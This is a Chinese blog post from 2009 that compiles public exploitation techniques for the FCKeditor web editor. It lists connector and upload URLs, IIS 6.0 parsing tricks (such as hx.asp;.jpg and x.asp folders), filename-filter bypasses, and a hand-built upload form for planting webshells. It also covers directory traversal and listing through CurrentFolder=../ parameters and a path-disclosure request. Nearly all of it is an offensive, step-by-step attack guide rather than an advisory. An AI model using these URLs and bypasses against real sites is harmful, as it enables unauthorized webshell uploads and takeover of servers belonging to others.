对Fckeditor的一些漏洞总结

2009, November 10, 5:49 PM. 漏洞集研
Submitted by admin

当然这都是网上公开过的....这次把他总结出来..放到blog上希望对大家有所帮助

Fckeditor版本多..支持很多语言..所以本文不针对任何版本或者什么语言.只讲利用方法
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp
当你知道fckeditor目录时..你输入以上地址..就会看到有个上传的地方..如图所示:
大小: 140.55 K 尺寸: 500 x 356 浏览: 85 次 点击打开新窗口浏览全图

这里有个上传的地方...老版本的fckeditor可以上传.Asa后缀的文件(也就是你的马) 如
果不行的话...我们可以利用iis的路径解析漏洞.建一个hx.Asp的目录.再这目录下上传马
还可以上传“图片”.这里指的图片是.Jpg格式后缀的马(结合iis6.0的解析漏洞
hx.Asp;.Jpg)以上效果如图所示:
大小: 81.11 K 尺寸: 366 x 500 浏览: 47 次 点击打开新窗口浏览全图

因为版本的不同..有些管理员会把一些没用的目录删除..比如我是aspx的站..就会把asp.Php的目录删了..
那么这时候自己就要改..fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
改成这样是一样的..也有时候有的站会把asp破坏掉..而这时假到aspx php都没有做任何
破坏..所以有时修自己多跳下目录..browser.html?Type=Image这里image是表示类型..
如果你打不开fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp里..可以试着打开
fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.Asp
..Type类型可以自己改.我没碰到过..
fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.Asp
这样的可以跳到根目录...很少碰到...不过也不是不存在这样的站...这里也可以把全站目
录列出来..
那么这样都被破坏了..也都不行了...那要怎么办呢..在connectors目录下有个test.Html
文件..那里也可以上传..可以上传任意文件他都会返回一个地址给你..如图所示:

大小: 79.73 K 尺寸: 500 x 404 浏览: 54 次 点击打开新窗口浏览全图

虽然是
返回不允许上传的类型..但还是会返回地址..那个路径是在下面框里查看源文件得到的...

大小: 82.71 K 尺寸: 500 x 447 浏览: 57 次 点击打开新窗口浏览全图

上传cer有时候也行.hx.Jpg;hx.Jpg 都行...在test.Html页面里有几个地方要注意..
Connector 也就是Connector=connectors/asp/connector.Asp是一个样的哈..有aspx php
等..其实都只是调用..如果asp不行..换aspx php 同上方法...还有一个是本地构造上传
的源码如下:
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com.cn/fckeditor/editor/filemanager/browser/default/connectors/asp/upload.asp?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
没了test.Html这里也还可以上传..一样的效果..有些网站的connectors/asp/upload.Asp
所在的目录不一定相同...有的是fckeditor/editor/connectors/asp/upload.Asp这路径..
And so on 补上一个知识...有时候上传的木马名hx.Asp;hx.Jpg hx.Asp这个时候会被过
滤掉前面的.我们可以把.进行url编码下成%2E(成功机率没测试过)
   下面就是找路径的方法了...上传上去的马别找不到路径那就完了..在
fckeditor/editor/目录下有个fckeditor.Html文件..我们访问如图所示:那么我们怎么找
上传马的路径呢??我们打开上面一个超链接的按钮..如图所示:
大小: 64.47 K 尺寸: 500 x 429 浏览: 109 次 点击打开新窗口浏览全图

有个浏览服务器..我们打开.如图所示:

大小: 61.2 K 尺寸: 500 x 484 浏览: 46 次 点击打开新窗口浏览全图

找到自己的马点两下你就会发现马的路径已经在你面前了...如图所示:

大小: 124.17 K 尺寸: 500 x 413 浏览: 46 次 点击打开新窗口浏览全图大小: 46.36 K 尺寸: 500 x 446 浏览: 58 次 点击打开新窗口浏览全图

里面有个图片上传(同理)
那么要是没有这个fckeditor.Html 或者fckeditor.Html打开是“空白页面”呢?
我们还有种方法来列出目录..如图所示:
fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F 这是列出file目录的路径.有的可以列..当然版本不

大小: 77.6 K 尺寸: 500 x 379 浏览: 42 次 点击打开新窗口浏览全图

大小: 119.2 K 尺寸: 500 x 217 浏览: 55 次 点击打开新窗口浏览全图

有的显示不同..也有的不能列出来..还有种是那个本地构造的上传怎么找马...当你按下
upload按钮时就会跳到一个页面..右键查看源文件就可以知道路径了...再还有网上的一
种用遨游浏览器的方法..比较麻烦...呵呵...还有种方法就是经验的老道了...也可以扫全
站目录来猜你马的目录路径...And so on
好了总结的也差不多了..如果我哪里没有总结到..请大家指出来... Php jsp等那些版本
的漏洞..精简版的国内很少了吧.国外的有蛮多的...这里都不提了...

=======================================

 

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=f:\usr\gxt020001\Database



Current Folder 写x.asp 然后create folder写一次同样的x.asp 文件夹就建立了
同样的文件上传两次.

 

直接在IE访问 FckEditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=c.asp&NewFolderName=z&uuid=1244789975684
后门要加uuid=xxxxxx就可以了 不必那么麻烦啊


同样 新建 创建一个”c.cdx”的文件夹,也可以当ASP执行

Current Folder 写x.asp 然后create folder写一次同样的x.asp 文件夹就建立了

(t00ls.net)

--------------------------------------------------------------------

FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/aspx/connector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/php/connector.php

 

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp            ------image改为../或者../../跨目录上传

 

fckeditor/editor/filemanager/browser/default/connectors/asp/upload.asp

fckeditor/editor/filemanager/browser/default/connectors/aspx/upload.aspx

fckeditor/editor/filemanager/browser/default/connectors/php/upload.php

 fckeditor/editor/filemanager/connectors/asp/upload.asp

fckeditor/editor/filemanager/connectors/aspx/upload.aspx

fckeditor/editor/filemanager/connectors/php/upload.php

fckeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

fckeditor/editor/filemanager/upload/test.html

fckeditor/editor/filemanager/upload/asp/upload.asp

fckeditor/editor/filemanager/upload/aspx/upload.aspx

fckeditor/editor/filemanager/upload/php/upload.php

fckeditor/editor/filemanager/browser/default/connectors/test.html

 FCKeditor/editor/fckeditor.html

fckeditor/editor/fckeditor.html?InstanceName=info&amp

FCKeditor/_samples/default.html

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.xxxx.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp

 

列目录

fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../../../

 

暴路径

/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

 

ecshop上传目录

/includes/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.xxx.com%2Fincludes%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php

 

 

 

--------------------------------------------------------------------

1.查看编辑器版本
FCKeditor/_whatsnew.html

2. Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破!测试通过。

 

3.很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
    提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
    继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制

4.其他上传地址
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录,可以试试。
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。

5.列目录漏洞也可助找上传地址
Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
也可以直接浏览盘符:
JSP 版本:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

6.爆路径漏洞
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

Tags: fckeditor

« 上一篇 | 下一篇 »

只显示10条记录相关文章
kingcms 5.0 fckeditor 漏洞 (浏览: 11435, 评论: 0)
fckeditor再掀漏洞利用风波(0day) (浏览: 17788, 评论: 0)
突破防篡改 继续上传(fckeditor)例! (浏览: 10004, 评论: 0)
关于Fckeditor2次上传漏洞 (浏览: 11888, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):